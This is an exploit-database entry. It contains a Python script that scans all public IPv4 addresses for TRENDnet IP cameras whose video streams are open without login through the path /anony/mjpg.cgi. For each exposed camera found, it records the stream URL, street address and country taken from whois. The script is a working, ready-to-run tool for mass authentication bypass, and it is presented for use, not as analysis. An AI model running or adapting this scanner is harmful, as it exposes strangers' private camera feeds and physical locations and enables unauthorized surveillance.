#; TRENDNet IP Cam Authentication Bypass Vulnerability

1. Full title: TRENDNet IP Cam Authentication Bypass Vulnerability
2. Date add: 2013-04-12
3. Category: remote exploits
4. Verified: Verified
5. Platform: hardware
6. --------------------------------------------------------------------
7.  
8. # Exploit Title: TRENDNet IP Cam Magic URL Searcher.
9. # Date: [10/04/2013]
10. # Author: [SnakingMax]
11. # Website: http://snakingmax.blogspot.com/
12. # Category: [Remote Exploit]
13.  
14.  
15. # Vulnerability description:
16. # Bypass the TRENDNet IP Cam authentication protection by ussing a magic url ^.^
17. #
18. # Software Description:
19. # This software scans Internet to find TRENDNet IP vulnerable cams.
20.  
21. from struct import *
22. from socket import *
23. from http.client import HTTPConnection
24. import urllib.request
25. import subprocess
26.  
27.  
28. def isPublicIP(ip):
29. #This method responses True if is a public IP or False in otherwise.
30. f = unpack('!I',inet_pton(AF_INET,ip))[0]
31. private = (["127.0.0.0","255.0.0.0"],["192.168.0.0","255.255.0.0"],["172.16.0.0","255.240.0.0"],["10.0.0.0","255.0.0.0"])
32.  
33. for net in private:
34. mask = unpack('!I',inet_aton(net[1]))[0]
35. p = unpack('!I',inet_aton(net[0]))[0]
36. if (f & mask) == p:
37. return False
38. return True
39.  
40.  
41. def isPublicWebcam(ip):
42. #This method responses True if the IP is a webcam or False in otherwise.
43. try:
44. conn = HTTPConnection(ip, 80, timeout=5)
45. conn.request('GET', "/anony/mjpg.cgi")
46. response = conn.getresponse()
47. if (response.info()["content-type"] == 'multipart/x-mixed-replace;boundary=myboundary'):
48. response.close()
49. conn.close()
50. return True
51. response.close()
52. conn.close()
53. return False
54. except Exception as E:
55. return False
56. response.close()
57. conn.close()
58.  
59.  
60. def addThisCamToMyList(camIP):
61. #This method save data into a file called CamList.txt
62. camlist = open("CamList.txt", "at")
63. camlist.write("------------------------WEBCAM------------------------\n")
64.  
65. #Saving URL.
66. camlist.write(" URL: http://"+camIP+"/anony/mjpg.cgi\n")
67.  
68. #Getting and writting whois Information about the cam ip.
69. whoisInfo = subprocess.check_output(["whois", camIP])
70. whoisList = str(whoisInfo).split("\\n")
71. #Getting and writting address information.
72. for i in whoisList:
73. if (i.count("address")>0):
74. camlist.write(" ADDRESS:\n")
75. camlist.write(i[8:]+"\n")
76. #Getting and writting country Information.
77. for i in whoisList:
78. if (i.count("country")>0):
79. camlist.write(" COUNTRY:\n")
80. print(i[:8]+"\n")
81. break
82. camlist.write("------------------------------------------------------\n")
83. camlist.close()
84.  
85.  
86.  
87. if ( (__name__)=="__main__" ):
88. #Generating IP address.
89. for a in reversed(range(256)):
90. for b in reversed(range(256)):
91. for c in reversed(range(256)):
92. for d in range(1,255):
93. generatedIP = str(a)+"."+str(b)+"."+str(c)+"."+str(d)
94. #Check if generated IP is public.
95. if(isPublicIP(generatedIP)):
96. print("Testing IP: "+generatedIP)
97. #Check if the IP is a webcam.
98. if (isPublicWebcam(generatedIP)):
99. print(generatedIP + " is a webcam ;-)")
100. #Saving data about the camera into a file.
101. addThisCamToMyList(generatedIP)